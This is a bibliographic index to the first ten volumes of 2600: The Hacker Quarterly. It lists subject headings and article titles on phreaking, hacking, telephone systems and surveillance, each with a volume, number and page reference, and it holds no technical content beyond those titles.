operating systems..see individual entries (e.g. VM/CMS, UNIX...)
operator humor                  7(4):16
operator identification of 
 payphone                       1(2):10(L)
operator service                4(9):6
operators                       1(10):56
operators--social engineering   3(5):33
operators--USSR                 5(4):30
ouch!                           5(2):16
outages                         8(2):35
outdial list                    8(1):40, 8(2):44
"Out of the Inner Circle"       2(6):34
outside local loop 
 distribution plant             5(3):4
pagers--scanning                4(6):5
paranoia                        1(7):3, 2(1):1, 3(5):39, 8(2):4, 2(8):50,
                                1(7):1, 9(4):4
parking summons                 1(7):3
password grabber                3(8):60(L)
passwords                       4(9):14, 8(1):36, 9(3):31, 4(8):10,
                                4(5):4
passwords--common               9(3):31
passwords--hacking IBMs         8(1):36
passwords--UNIX                 8(1):31
pay phones                      6(1):30, 1(11):62, 6(3):37, 1(2):10
pay phone--destruction          3(10):73
pay phone--dissection           3(10):73, 9(1):20
PBX trix                        4(1):12(L)
PC Pursuit                      2(9):58
PC Pursuit--hacking             4(4):6
PC-Pursuit--outdial list        8(2):44
PDP-11                          2(11):73
Pen registers                   3(2):11, 4(9):13, 4(12):12(L), 4(5):22
Pentagon                        1(12):69
People Express                  2(5):25
pet cemeteries                  8(2):35 
Phiber Optik                    10(4):4
phone directories of the World  4(4):16
phone frequencies               5(4):19
phone interception              5(1):4
phone news                      9(2):19
phone numbers                   8(1):17
Phoenix Project                 7(1):3
Phrack                          7(1):3, 7(2):3, 7(2):4, 7(2):8, 8(1):11,
                                8(4):36, 9(2):22 
phreak anecdotes                1(9):52
phreak history                  2(11):80, 5(3):9
phreak typologies               2(3):13
phreaking overview              9(2):10
Pick operating system           3(6):42
pink noise                      2(2):7
PINs                            4(11):8
pirate radio                    6(2):42
Pitcairn Island                 2(9):59
PKZIP BBS hack method           9(1):12
plane phones                    1(11):63
poetry                          4(8):20, 4(3):4
police computers                2(5):27
police setups                   3(4):30
police surveillance             1(8):44
political hacking               7(4):4
porn                            2(6):35
postal paranoia                 4(3):12(L), 1(4):20(L)
POSTNET                         8(4):21, 8(3):32
PRIMOS                          7(2):14, 6(2):4, 6(4):14
prison computers                8(4):5
prison phones                   7(3):29(L), 9(4):13
prison update                   8(2):46
privacy                         1(5):3
Privacy Act of 1974             8(3):18
Private Sector BBS              2(8):49, 2(9):59, 3(1):1, 3(3):22, 3(4):30
Prodigy censorship              6(4):43(L)
Prodigy--STAGE.DAT conspiracy   8(3):26, 8(4):29(L), 8(1):19
product list                    7(4):6
product review: Duophone 
 CPA-1000                       4(5):22
Programs--Hacking IBMs          8(1):36
PRONTO                          2(7):42
proto-phreak                    5(3):9
PSAP                            7(1):37
psychological makeups           8(3):38
psychobabble                    7(3):44
Puerto Rico                     3(10):76(L)
pyramid schemes                 3(10):79, 4(6):4
radio scanners                  6(2):22, 5(4):45
Raids...see busts  
RC channel                      10(2):4, 8(4):45
RCI                             3(9):65
RCMAC                           7(1):8
Reagan, Ron                     2(5):27, 1(12):69, 3(11):83
REMOB (Remote
 Observation)                   5(1):27(L), 2(5):28(L), 6(3):32, 7(1):24(L),
                                2(9):60(L)
resources guide                 3(6):46, 7(4):6
return call                     9(2):31
The Rise of the Computer State  1(8):44
ROLM                            6(3):24(L), 3(11):88(L)
ROLM CBX II 9000                5(1):30
Rose, Len                       8(2):12, 8(1):11
routing codes                   5(1):42
Royko, Mike                     2(11):75
RS CPA-1000                     4(5):22
RSTS                            3(4):25, 2(11):73
Russian phone books             3(5):36(L)
Russian phone numbers           3(5):36(L)
SAC                             5(3):4
Santa scam                      6(1):36
SAT                             10(1):4
satellite phone transmissions   4(11):7
satellite links                 5(1):4
satellite jamming               3(3):23
satellites--hacking myths       2(8):52
Saudi Arabia                    4(7):21, 3(10):80(L)
scams                           7(4):22, 2(4):21
scanners                        7(1):19
SCCs                            7(1):8, 7(1):37
school records                  10(2):13, 10(4):15, 10(3):34
scramblers                      1(8):46(L), 3(4):29
secret frequencies              8(2):32
Secret Service                  2(6):34, 9(4):4, 9(4):12, 9(2):38, 10(1):18,
                                10(1):43, 10(3):18 
Secret Service--radio 
 frequencies                    9(1):17
secured trunks                  6(1):24(L)
sentry security                 8(4):5
security                        8(2):18, 7(3):10
Serving Area Interface          5(3):4
Sherwood Forest--busted         2(6):34
shortwave                       3(9):67
$SHOW PROCESS/PRIV              4(1):6
Simplex corrections             8(4):21
Simplex lock location guide     9(1):38
Simplex locks                   8(3):6
SL-1 Switch                     3(9):68(L)
Smartphone hacking              10(4):11
"Sneakers"                      9(3):17
social engineering              2(3):14, 2(4):19
Social Security Number 
 prefixes                       4(11):6
South Africa                    4(10):11
South African phreaks           6(2):24(L)
SouthWestern Bell               9(4):42
Soviet Union                    8(1):16
Spain                           6(2):36
Speech Thing: product review    9(4):45
spoofing VAX login              4(8):10
Springsteen                     2(11):75
Sprint                          6(2):34
spying on 2600                  7(3):44
SS7                             10(3):12
SSNs                            3(7):51, 8(3):18
SSTs                            7(1):12
Step Offices                    1(5):1
Sterling, Bruce                 9(3):21
Steve Jackson Games             10(1):23
Stasi                           8(1):19
sting BBS's                     3(6):44(L), 3(9):66
stings                          3(5):39
Stoll, Cliff                    7(1):45
Strowger, Almon                 5(3):9
submarine cable maps            4(8):11
surveillance                    3(12):95
survey                          2(12):84, 4(8):15
Sweden's "Person Numbers"(ID)   1(3):3
SWITCH                          8(1):42
switch guide                    1(5):1, 7(4):12, 10(4):9, 10(4):10
switch overloading              3(12):91
switch-hook dialing             4(12):12(L)
switches...see specific switch
switching centers               1(10):56
switching routes                2(3):16(L)
switching systems               2(5):27
Sysops--protective measures     2(8):55
TAP                             4(1):4, 6(2):43
taping payphone tones           7(3):36
telco info-fishing techniques   3(10):76(L)
telco nonsense                  1(5):4, 9(3):36
telco offices                   10(2):36
telco reneging                  2(10):65
telco--fighting back            1(8):46
telco--assisting wiretaps       2(1):1
tele-harassment                 3(2):10
Telecom                         6(3):12, 3(8):58
Telecom debit cards             4(1):8
teleconferencing                2(5):26
teleconferencing--anecdotes     1(4):4
telemail--access                1(4):2
Telenet                         3(6):47, 2(9):61, 4(6):9, 4(5):10, 3(11):84(L),
                                1(2):7
telephone basics                1(8):43
telephone induction coil        7(3):36
Telstar 301                     4(11):7
TELETEL Networks                9(4):8
"Terac"                         5(1):24(L)
terminal locks                  8(3):44
test channel                    10(2):4, 8(4):45
test equipment--construction    8(2):14
test numbers                    2(11):77
Thailand                        2(6):39
Thought Police                  1(8):44, 8(4):8, 1(12):68, 7(3):16
time service                    2(4):21
TINA                            2(6):39
toll fraud detection            7(1):12, 9(3):43
tone tracer construction        8(2):14
tone catcher                    10(4):22
TOPS-10                         2(1):2
TOPS-20                         2(1):2
touch tones                     3(12):91
touch-tone fees                 4(10):6, 4(10):7, 4(2):18
trace procedures                3(1):4(L), 7(4):12
tracking devices                3(4):28(L)
trade magazines                 4(6):13(L)
transaction codes               2(12):82
Trans-Pacific Cable             2(11):79
trap tracing--defeating         7(3):22
trashing                        2(2):8, 1(2):10, 1(9):50, 3(10):73, 6(2):32
Travelnet                       1(11):61
trojan                          6(4):6, 5(2):4, 3(7):49
TRW                             2(2):9, 4(8):4, 1(7):5, 10(1):42
TSPS                            1(2):10, 2(1):4(L), 6(1):30, 1(11):62
TSPS Console                    4(6):6
TVRO                            5(1):4
UAPC                            6(3):4, 6(4):45
UK Data Protection Act          10(2):12
UK Message List                 4(9):10
UK Operator Numbers             3(8):58
Ultra Forward                   9(2):31
unassigned area codes           5(3):10
UNIX--common accounts           9(3):31
UNIX--hacking                   3(4):28(L), 3(8):57, 5(4):12, 6(3):28(L),
                                6(4):4, 2(1):2
UNIX--password hacker           9(1):18, 8(1):31, 8(2):24(L)
USC--Phony Degrees              2(2):9
U.S. Military Telephone 
 Network                        9(4):19
USPS                            8(3):32, 8(4):32
USSR                            2(4):21, 3(8):63, 5(4):30
UUCP                            4(9):4
VAX                             3(8):60(L), 4(5):4, 3(7):49, 2(9):57, 4(1):6
VAX--common accounts            9(3):31
VAX--worm                       6(2):38
VMS                             4(5):4
VDT                             3(3):19
VDT operators                   3(8):59
vehicle tracking monitors       1(1):3
verification                    2(9):58, 4(12):10
VFY                             4(12):10
video reviews                   10(2):40
VINs                            9(4):11
viri                            5(2):4, 5(2):8, 6(3):14, 9(3):19
virus--Atari code               8(1):4
virus--batch virus              9(1):8
virus--Gulf War                 8(4):39
virus--MSDOS (code)             9(1):4
virus "protection"              5(2):4, 9(1):9
virtual reality                 10(4):37
Virtual Memory operating System--see VMS
VM/CMS                          4(11):4, 4(12):4, 5(1):8
VM/CMS--acronyms                4(11):4
VM/CMS--filemodes               4(12):4
VM/CMS--password 
 characteristics                4(12):4
VM/CMS--privileged commands     4(12):4
voice mail hacking              6(3):36, 9(2):42
VMS                             3(3):18, 3(8):60(L), 2(9):57, 3(2):9,
                                2(10):66, 3(7):52, 4(1):6, 2(1):2
VMS--UAF                        2(10):66
VMS--common accounts            9(3):31
VMS--default passwords          3(7):52(L)
VR                              3(9):71
WATS                            5(3):23, 3(11):81, 1(9):52(L)
WATS directory                  4(1):18(L), 4(4):21(L)
Weathertrak codes               5(1):15
Wendland, Mike                  3(9):66
Western Union                   4(7):6
Western Union EasyLink          1(12):67
White House phones              1(1):5, 10(1):12
wild claims                     6(4):30(L)
Winnipeg                        3(9):69
wire fraud news                 2(3):15
wireless modem                  4(7):13(L)
wiretaps                        1(4):3, 2(6):35, 2(1):1, 7(3):30(L),
                                3(12):91, 1(11):63, 1(10):57, 2(9):58,
                                9(2):22
wiretaps--legalities            1(5):3
wiretaps--police                1(3):3
witch hunts                     7(3):10
word numbers                    4(4):15
world's most evil operator      1(7):3(L)
worms                           5(2):4
worm--Ada                       6(2):38
worm--internet                  6(3):39
WWIV BBS--hacking               9(1):12
XY Step switching station       1(5):3(L)
YIPL...see TAP
yellow pages                    3(3):23
yellow pages scam               2(5):27
Zinn, Herbert                   6(1):3, 7(1):3  

Title Index: 2600 Volume 1 - 10  
David Price

The Title Index references all articles in 2600 THE HACKER 
QUARTERLY from Volume 1 (1984) through Volume 10 (1993).  
These articles are referenced using the following format: 
V(N):P  Where V = Volume, N = Number, and P = Page 

EXAMPLE: 
Building a Telephone Induction Coil     7(3):36  

Thus the article in the above example is found in Volume 7, 
Number Three, on page 36. 

~   Denotes a "news" article  
(L) Denotes a letter of note

------------2600 Title Index, Vol. 1 - Vol. 10------------- 

1984 Arrives in Hong Kong~              1(1):3   
$2 Billion Error~                       2(7):43  
22013664431--Call it!                   3(3):22  
2600 A Hacking Victim~                  2(8):51  
2600 Bulletin Board Online              2(2):9  
2600 Exposes New York Tel               4(7):15  
2600 Information Bulletin               3(9):69  
2600 Information Bureau                 3(10):77  
2600 Information Bureau                 3(8):61  
2600 Information Bureau                 3(11):85  
2600 Information Bureau                 3(12):93  
2600 Writer Indicted~                   1(6):3  
411--News About Phone Companies~        8(2):35  
414 Bust~                               2(5):27  
414's Plead Guilty~                     1(4):3  
4TEL                                    6(3):20  
$6,829 Phone Bill~                      3(6):43  
617 Will be Divided~                    3(4):31  
718 Is Coming~                          1(3):3  
74,000 Calls to Fraud Line~             3(7):55  
800 Directories Now Available~          1(8):45  
800 Prefixes Listed by States           2(6):37  
818 Here to Stay~                       1(11):63  
911 Suspect Hung Up~                    1(10):57  
A 414 is Sentenced--Other Indicted~     1(5):3  
A Batch Virus                           9(1):8  
A Bittersweet Victory                   7(2):3  
A Blast From the Past                   9(4):33  
A Challenge to Hackers~                 2(1):3  
A Form of Protection For You & Your  
  Computer                              5(2):4  
A Friend in High Places                 1(9):52  
A Guide to PRIMOS                       6(2):4  
A Guide to the 5ESS                     10(2):4  
A Guide to the Israeli Phone System     2(6):33  
A Guide to VMS                          2(9):57  
A Hacker Survey                         4(8):15  
A Hacker's Guide to the TSPS Console    4(6):6  
A Hacker's Guide to UNIX                5(4):12  
A Hacking Reading List                  7(4):6  
A Look at the Future Phreaking World:  
  Cellular Telephones--How They Work    3(12):89  
A Mechanical Hacker~                    2(3):15  
A Pen Register For Phreaks?: Product  
  Review--Dialed Number Recorder        4(5):22  
A Phone Phreak Scores                   2(4):19  
A Political Hacking Scandal             7(4):4  
A Reader's Reply to Captain Zap         5(2):16  
A Report on the Internet Worm           5(4):4  
A Review of "The 'Top Secret' Registry  
  of US Government Radio Frequencies"   4(11):7  
A Simple Virus in C                     9(3):19  
A Story of Eavesdropping                3(4):29  
A Study of Hackers                      10(1):38  
A Time For Reflection                   1(12):67  
A Trip to England                       3(8):58  
A True Saga of Teleconferencing         1(4):4  
A Unique Obscene Caller~                3(2):1  
A Way To Catch Peepers                  9(1):35  
A Word on Wiretapping~                  1(4):3  
Acoustic Trauma                         3(2):15  
Acronym List                            2(2):11  
Acronyms A-G                            10(1):34  
Acronyms H-R                            10(2):20  
Acronyms S-X (no y or z)                10(3):44  
ADS Investigation Moved?~               1(2):9  
AHOY!                                   1(1):1  
algorithm for credit cards correction   7(4):25  
All About BLV: Busy Line Verification   4(12):10  
Allnet's Legal Problems                 5(2):2  
Allnet: A Horror Story                  4(6):4  
Alternate Long Distance                 1(3):2  
American Network Fears Hackers~         3(5):39  
An Algorithm for Credit Cards           7(3):42  
An American Express Phone Story         3(3):17  
An Appeal For Help                      8(4):36  
An Interesting Diversion                2(10):65  
An Interpretation of Computer Hacking   5(1):16  
An Interview with Craig Neidorf         7(2):8  
An Interview with Dorothy Denning       7(3):10  
An Interview with Hugo Cornwall:  
  British Hacker/Author                 4(2):4  
An Interview With the Chaos Computer  
  Club                                  5(4):34  
An Introduction to COCOTS               7(2):20  
An MS-DOS Virus                         9(1):4  
An Official Crackdown on Hackers~       1(7):3  
An Overview of AUTOVON and Silver Boxes 3(3):17  
An Overview of DSS1                     10(3):36  
ANALYSIS: Gulf War Printer Virus        8(4):39  
Anatomy of a rip-off                    7(4):22  
And They Call US Crooks?                2(10):65  
Another Astronomical Phone Bill~        3(1):3  
Another FBI Computer File~              1(11):63  
Another Hacker Story~                   1(9):51  
Another Stinger Is Stung                3(9):66  
ANSI Bomb                               10(2):44  
Are You a Phreak???                     2(3):13  
ARPANET Hopping: America's Newest  
  Past time                             1(6):1  
ARPANet Military Subnets                1(3):5  
At the Last Stroke...~                  2(4):21  
AT&T Best For Hackers~                  3(9):71  
AT&T Computer Caught Stealing~          2(6):35  
AT&T Contractual Obligations~           2(6):39  
AT&T Credit Cards Make Debut~           1(1):3  
AT&T Does it Again~                     3(1):3  
AT&T Faces Serious Money Problems~      1(9):51  
AT&T Keeps "800" Data To Itself~        2(2):9  
AT&T Limits Use of their Credit Cards~  1(6):3  
AT&T Offers E-Mail~                     2(12):87  
AT&T Put On Hold~                       2(7):47  
AT&T Selling Pay Phones~                3(7):55  
AT&T Sub Maps                           4(8):11  
AT&T to Read E-Mail~                    2(11):79  
AT&T/BOC Routing Codes                  5(1):42  
ATM's in China~                         3(8):63  
Automated Operators Coming~             3(7):55  
AUTOVON Numbers                         3(5):37  
Avoid Phones in Storms!~                2(11):79  
Bad Tenant Database~                    3(4):27  
Bank Records Aren't So Private~         1(5):3  
Banking from your Terminal--A Look  
  at PRONTO                             2(7):42  
BASIC "Wargames Dialer Program"         5(1):20  
BASIC Red Box Tones                     5(3):22  
BB Traffic Cop~                         3(9):67  
BB Watching VDT Operators~              3(8):59  
BB Watching Without Regulation~         2(12):83  
BBS Listing                             2(12):85  
Be Nice to Your Telco                   1(8):46  
Beginner's Guide to Minitel             9(4):8  
Beige Box Construction                  10(1):14  
Belcore's Plans for Caller ID           9(2):18  
Bell Atlantic & MCI Collaborate~        3(2):15  
Bell Credit Card Abuse Soars~           1(4):3  
Bell Didn't Invent Phone?~              2(6):35  
Bell Propaganda Films~                  2(9):63  
Bell to AT&T: Get Lost!~                1(7):3  
Bellcore Publications Go Public~        3(5):36  
Beware of Hacker Terrorists~            3(5):39  
Big Brother No longer Watching Miami~   1(8):44  
Big Computer Crime Pays~                3(6):43  
Big Deal for Little Town~               2(11):75  
BIN List                                8(2):31  
Birth of a Low Technology Hacker        8(4):16  
BITnet Topology                         2(1):6  
Blue Box Schematic                      2(10):69  
Bogota, Columbia Gets Extra Digit~      3(5):39  
Book Review Nothing New in Computer  
  Underground by M. Harry               3(6):42  
Book Review: "Automatic Teller  
  Machines III"                         4(2):21  
Book Review: "The Hacker's Handbook"    4(2):15  
Book Review: Approaching Zero           10(3):38  
Book Review: The Cuckoo's Egg           7(1):45  
Book Review: The Devouring Fungus  
  (Tales of the Computer Age)           9(2):40  
Book Review: Tune in on Telephone Calls  
  by Tom Kneitel                        5(4):45  
Book Review: Virtual Reality            10(4):37  
BOXING ON ITT                           3(5):38  
British Credit Holes                    10(2):12  
British News                            10(1):44  
British Phonebooth Wedding~             3(4):27  
British Telecom: Guilty                 6(3):12  
Build A Tone Tracer                     8(2):14  
Building a DTMF Decoder                 7(1):14  
Building a Red Box                      5(2):13  
Building a Telephone Induction Coil     7(3):36  
But How Does it Work?                   1(8):43  
Buy My Wires~                           3(12):95  
Call Rejection in Natchez~              3(9):71  
Caller ID Technologies                  10(3):12  
Caller ID: The Facts                    7(3):5   
"Call Me" Card~                         2(6):39  
Campaign Contributions On-Line~         2(10):71  
Capitol Hill Hacker~                    3(6):43  
Capturing Passwords                     4(8):10  
Car Breathalizers~                      3(4):27  
Carrier Access Codes                    6(3):42  
Carrier Choosing Time~                  2(5):27  
Cash Machines Are Popular~              3(8):63  
Canadian WATS Phonebook                 5(3):23  
Cell Site Frequencies                   4(1):10  
Cellular Dial-By-Voice~                 3(7):55  
Cellular Magic                          10(1):4  
Cellular Modem~                         3(5):35  
Cellular Phone Biopsy                   10(4):6  
Cellular Phone Fraud and Where It's  
  Headed                                4(7):4  
Cellular Phones in England              3(2):15  
Cellular Update                         5(3):8  
Central Office Operations               7(4):12  
Changing Your Grades on A High  
  School Computer                       10(3):34  
Chinese Snitch Numbers                  6(2):35  
Cipher Fun                              9(4):6  
CIS Copyrights Public Software~         3(10):75  
Citybank Money Games~                   3(6):43  
Cityphone Has the Answer~               2(12):83  
Class Features                          8(4):31  
CLASS: What It Means To Us              4(5):6  
CNA Numbers                             4(4):10  
CNAs                                    2(3):18  
COCOT Corner                            8(4):33  
COCOT Numbers                           8(3):22  
Columnist Attacks AT&T~                 2(11):75  
Commentary: The Threat to Us All        2(8):50  
Competition...It's the next best  
  thing to being there                  6(3):3  
Computel Does Exist~                    2(3):15  
Computel Put to Sleep                   4(4):4  
Computer Clothing                       3(9):71  
Computer College                        3(11):87  
Computer Crime Resources Guide          3(6):46  
Computer Crime Review                   3(6):41  
Computer Elections Examined~            2(10):67  
Computer Foul-ups Hurt Social Security~ 1(11):63  
Computer Grammar~                       3(5):35  
Computer Makes it Easy for Reagan~      1(12):69  
Computer Password Kept Secret           3(3):19  
Computer Security at the Bureau of  
  Prisons                               8(4):5  
Computer Threat Causes Chaos in Albany~ 1(6):3  
Computers Monitor Truckers~             2(7):43  
Computers Seized as Summer Games Begin~ 1(8):45  
Computers Strike Again!~                3(7):51  
Computers Threaten Privacy~             3(12):91  
Congress Chooses AT&T~                  3(4):31  
Congress Takes a Holiday                10(3):4  
Congressional Computer~                 3(5):35  
Converting a Tone Dialer into a Red Box 7(3):32  
Count of Exchanges per Area Code        3(8):62  
Country Codes                           1(2):10  
Country Codes                           3(7):53  
"Crackers" Cracked~                     2(5):27  
Crosstalk Saves Old Lady~               3(9):67  
Crypt() Source Code                     8(4):11  
Data Network Identification Codes       7(1):40  
Death of a Pay Phone                    3(10):73  
Death of NYNEX Business Centers         8(2):11  
Death Star Cards Spell Woe~             1(2):9  
"Debugging" Phones~                     3(8):63  
Decrypting Password Security            4(9):14  
Defeating Callback Verification         9(3):9  
Defeating Trap Tracing                  7(3):22  
Defense Data Network Listing            1(5):4  
Descrambling Cable                      10(1):16  
Dial "00" For Operator~                 3(4):31  
Dial Back Security                      3(2):10  
Dial the Yellow Pages~                  3(3):23  
Dial-a-Directory~                       2(5):27  
Dial-A-Porn Update~                     3(1):3  
Dial-it Sex Numbers Argued~             2(11):75  
Dick Tracey Toys Are Closing In~        2(9):63  
Did You Know?                           4(7):17  
Digital Locks                           10(4):38  
Directory Assistance By Computer~       2(9):63  
Directory Assistance Failure~           3(4):31  
Dreams of GEnie~                        2(12):87  
E-COM is Going Away~                    1(6):3  
E-COM Number List                       1(6):5  
E-COM Really on the Way~                2(7):47  
"Ed Quinn Cell Site"~                   3(6):47  
E-Mail Horror Stories                   1(12):68  
E-Mail Listings                         1(12):71  
Electronic Jail All Screwed UP~         1(12):69  
Electronic Switching Advantages         1(6):2  
Electronic Tax Returns Are Here         3(2):15  
Electronic Tax Returns~                 3(10):79  
Electronics Create Portable Prisons~    1(4):2  
Elementary Switching                    10(4):9  
Encryption Provides Signature~          3(4):31  
England's Mass Announcements            4(9):10  
Equal Access 800 Drawbacks~             3(4):31  
Equal Access May Not be "Equal"  
  to Modems                             2(11):74  
ESS Goes To Taiwan                      3(10):79  
ESS: Orwell's Prophecy                  1(2):8  
Europe Standardizing Telecoms~          2(9):63  
Ever Wonder Who Owns All Those  
  800 Numbers?                          6(1):12  
Ex-Fed Tapped                           3(7):51  
Exchange List: 201 Area Code            6(2):20  
Exploits in Operator Hell               3(5):33  
Exploring Caves in Travelnet            1(11):61  
Facts and Rumors                        7(3):44  
Fascinating fone fun                    9(1):45  
Fascist Computer Network~               2(1):3  
Fawcett Phone Bill Too Big~             2(12):83  
FAX: A New Hobby                        4(5):14  
FBI Actions Anger Parents               3(11):83  
FBI Goes After ADS Hackers              1(1):2  
FBI Investigates Coffee Machine~        3(10):75  
FBI Revealed: Reviews--The FBI Project  
  Newsletter & The FBI and Your BBS     4(8):9  
FBI Shopping List~                      3(9):67  
FCC Actions~                            1(6):3  
FCC Gives Away "Resource"               3(9):71  
Federal Employees "Tracked"~            3(7):51  
Federal Express Offers "E-Mail"~        1(8):45  
Federal Phone Failures~                 3(7):55  
Federal Telephone System Upgrade~       1(12):69  
Feedback                                9(4):26  
Fiber-Optic Network For Du Pont~        2(10):71  
Final Words on VMS                      3(3):18  
Fingerprint Identification System~      3(12):95  
First of the "Superminin"~              1(12):69  
Five Aliens Hung Up~                    3(1):3  
Five Arrested in Phone Fraud~           1(7):7  
FM Telephone Transmitter                8(4):45  
FM Wireless Transmitter                 8(4):44  
For Your Protection                     7(1):3  
Fraud Alert                             7(4):43  
Free Directories For Bigwigs~           3(12):95  
Free Information in Trouble~            1(4):3  
Free Kiddie Dial-It Calls~              2(11):79  
Free Pay-Phones Plague New Jersey~      3(5):39  
French Phones Renumbered~               2(12):83  
From Sherwood Forest: Intro to Hacking  2(6):40  
From the 2600 Files                     5(1):22  
Fun and Games at a 2600 Meeting         7(1):38  
Fun Phone Numbers                       5(2):44  
Fun Things to Know                      9(2):19  
Fun With COSMOS                         2(12):82  
Fun With Fortress Fones                 1(11):62  
Gee...GTE Telcos                        6(3):33  
GEISCO's New Toy~                       2(1):3  
General Information                     6(1):7  
German Phone System Stagnant~           2(12):87  
Getting Caught: Hacker's View           1(10):55  
Getting In The Back Door: A Guide to  
  Some Popular Operating Systems        2(1):2  
Getting Started                         9(3):42  
Getting the Most Out of Equal Access    4(3):6  
Getting Your File...                    10(1):42  
Goings On                               4(4):16  
Good Apples for the Soviets~            2(4):21  
Government Bulletin Boards              10(2):39  
Government Phone Fate?~                 3(8):63  
Grade "A" Hacking                       6(3):4  
Growth of a Low Tech Hacker             9(4):17  
GTE Hit by Divestiture~                 2(1):3  
GTE Now Bigger than AT&T~               2(7):47  
GTE Raids Still Have Many Unanswered  
  Questions~                            1(1):3  
GTE Sprint Cheats Customers~            2(7):43  
GTE Sprint Overbills~                   3(9):71  
Hacker Extortionist Caught~             2(9):59  
Hacker News~                            8(2):12  
Hacker Zaps Computer Marquee~           3(3):19  
Hackers Degree?~                        3(7):51  
Hackers Go Free~                        2(4):21  
Hackers Have Big Business Scared~       2(10):71  
Hackers In Jail                         6(1):3  
Hackers in Jail, Part Two               10(4):4  
Hackers in the World of Malls: Secret  
  Service Behind Harassment of 2600  
  Meetings                              9(4):4  
Hackers on Shortwave~                   3(9):67  
Hacking AmiExpress                      9(3):4  
Hacking at the End of The Universe      10(3):4  
Hacking Computer Shows                  10(4):16  
Hacking IBM's VM/CMS                    4(11):4  
Hacking IBM's VM/CMS--Part Two          4(12):4  
Hacking MCIMAX                          8(2):16  
Hacking on Telenet: It's as Easy  
  as 123456!                            1(2):7  
Hacking on the Front Line               9(3):31  
Hacking Packard                         2(3):20  
Hacking PC Pursuit                      4(4):6  
Hacking Smartphone                      10(4):11  
Hacking WWIV                            9(1):12  
Hands Across Telenet~                   3(6):47  
Happenings                              5(1):37  
Hardwiring Your Way In                  5(4):42  
HBO Encryption Broken~                  3(10):75  
Here They Are                           9(2):24  
Here We Go Again                        9(2):22  
Here's the Secret!                      2(11):73  
High School Hacking                     10(2):13  
High School Mac Hack                    10(4):15  
High Tech Happenings                    9(4):19  
High Tech Parking Meters~               3(5):35  
History of British Phreaking            1(9):49  
Hitchhiker Guide to the Phone System  
  Phreaking in the Nineties             9(2):10  
Home Computer Attacks Falwell~          3(1):3  
House: Hacking is Bad~                  1(8):45  
How Can Sysops Protect Themselves?      2(8):55  
How Cellular Phones Came About and What  
  You Can Expect                        3(11):90  
How Not to be Rejected~                 3(12):91  
How Payphones Really Work               6(1):30  
How Phone Phreaks are Caught            4(7):6  
How to Defeat *69                       9(2):31  
How to Build a Silver Box               6(4):20  
How to Get into a C.O.                  2(3):14  
How to Hack A Pick                      3(6):42  
How to Hack Honesty                     10(3):20  
How to Hear Phone Calls                 5(4):19  
How to Run a Successful Teleconference  2(5):26  
How to Take Apart A Payphone            9(1):20  
How to Use Your Silver Box              9(1):16  
Human Database Centers                  8(4):46  
I.R.S. Computers Screw Up~              2(3):15  
IBM ADS Directory                       1(9):53  
IBM Braille Compatible~                 3(12):95  
IBM Gets Bigger/Goodbye SBS~            2(7):47  
IBM's Audio Distribution Systems Sure  
  Can Be Fun!                           1(5):2  
IC and CIC Listing                      1(11):65  
Ice Cream Chain Aides Selective Service~ 1(8):45  
ICN--More than a Bargain                3(11):81  
Important News~                         4(12):3  
In Pursuit of Knowledge: An Atari 520ST  
  Virus                                 8(1):4  
Indian Phones Under Siege~              3(9):67  
Indiana "Fones" Are Gone                3(10):75  
Indiana Telco Threatens AT&T~           3(7):55  
Industrial Espionage Seminar~           2(3):15  
Infrared Beeper Will Find You           3(2):15  
Inmates Handle Information Calls~       2(12):83  
Inspect Implementation                  8(2):18  
Intelpost an Astronomical Failure~      1(5):3  
Interesting Things to do on a DEC-20    2(7):41  
International Hacking~                  3(12):91  
International NUA's                     4(10):10  
Internet Outdials                       8(1):40  
Introducing the Clear Box!              1(7):4  
IRS Drives Telco to Drink~              2(6):35  
IRS Wants Access to Telco Data~         2(1):3  
Is AT&T Hiding Near You?                9(4):36  
It Could Happen to You!                 3(2):10  
ITT Crackdown~                          2(7):43  
ITT Wiping Out Fee~                     1(8):45  
Jersey Wins Wiretap Race Again~         2(6):35  
Kenya Pay Phones Prove Popular~         2(3):15  
Kiev Calling Clogged~                   3(6):47  
Know Your Switch                        10(4):10  
Knowing UNIX                            3(8):57  
L.A. Law                                9(1):7  
Lair of the INTERNET Worm               6(3):39  
Lawsuit Filed Against Secret Service    10(1):43  
LD Companies Strike Back~               3(8):59  
Leaked Documents                        7(4):16  
Leave Our Poles Alone!~                 3(8):59  
Let's Move to France!~                  3(6):47  
Letter From Prison                      9(4):13  
Listening In                            7(1):19  
Listening In On Cellular Phones~        2(7):43  
Listening In: Catch Me if you Can!      4(11):7  
Local Toll-Free Numbers~                3(10):79  
Long Distance Option Timetable~         1(5):3
Look Out For Sidney~                    1(7):3  
"Look Out, He's Got A Computer!"        1(7):1  
Looking for Simplex Locks?              9(1):38  
Looking Up IBM Passwords                8(1):36  
Loophole in Wiretap Law                 3(12):91  
Loopholes Around Wiretap Laws~          1(10):57  
Magnetic Strips                         8(2):7  
Man Worries About Sprint Bill~          3(4):27  
Marcos Phones For Free~                 3(4):27  
Mastering the Networks                  3(11):82  
MCI Access Numbers & Mail Numbers       1(4):5  
MCI Expanding With Optical Fibers~      2(7):47  
MCI Goes to U.K.~                       2(5):27  
MCI Mail & Western Union EasyLink       1(12):67  
MCI Mail: The Adventure Continues       1(7):2  
MCI: The Phone Company With A Lot of  
  Explaining To Do                      5(4):10  
Meeting Advice                          10(2):16  
Meeting Advice                          10(2):17  
Meeting Mania                           10(3):18  
Messages on the Move~                   3(9):71  
MILNET TAC Dialups by Location          2(7):45  
Missing Children's Faces Displayed~     2(7):43  
Mobile Frequencies                      8(4):18  
Mobile Phones--Theory and Construction  3(4):26  
Monitoring Phone Calls With A TVRO      5(1):4  
More Banks Link Arms~                   3(11):87  
More Cellular Fun                       10(3):42  
More Conversion Tricks                  8(3):43  
More Divestiture Woes~                  2(10):71  
More Hacking on Primos                  6(4):14  
More Info on VMS                        2(10):66  
More Long Distance Unpleasantries       4(12):20  
More Magic Buttons~                     3(11):87  
More Meeting Advice                     10(4):35  
More On Hacking UNIX                    6(4):4     
More on Trashing: What to Look for,  
  How to Act, Where to Go               1(9):50  
More PC Jr's., Less Z-100's for Soviets~1(8):45  
More Phone Fraud~                       2(7):43  
More Telenet Addresses                  4(6):9  
More Use of Phone Computers~            2(10):71  
More VAX Tricks                         4(5):4  
Moving Satellites Right Up In the Blue 
  ...What Was Really Going On?          2(8):52  
Mystery Transistor~                     2(5):27  
Navigate With a CD~                     3(12):95  
Navy Calls Dial-A-Porn~                 2(10):67  
Navy Phone Phreaks Nabbed~              2(10):67  
Navy Software Available~                3(10):75  
Nazi BBS a Challenge to Hackers         2(3):13  
Negative Feedback                       7(2):11  
Net Addresses                           2(4):23  
